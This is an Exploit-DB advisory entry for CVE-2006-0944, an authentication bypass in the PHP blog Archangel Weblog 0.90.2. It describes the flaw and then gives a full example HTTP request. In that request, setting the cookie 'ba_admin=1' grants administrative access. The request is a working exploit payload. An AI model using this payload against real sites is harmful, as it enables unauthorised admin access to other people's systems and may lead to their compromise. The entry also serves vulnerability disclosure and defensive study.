Archangel Weblog 0.90.2 - Authentication Bypass Vulnerability

ID EDB-ID:27324
Type exploitdb
Reporter KingOfSka
Modified 2006-02-27T00:00:00


Archangel Weblog 0.90.2 Authentication Bypass Vulnerability. CVE-2006-0944. Webapps exploit for php platform


Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. 

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the affected application as an administrative user. This may facilitate a compromise of the underlying system; other attacks are also possible.

The following example HTTP request is sufficient to exploit this issue:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ba_admin=1
Cache-Control: max-age=0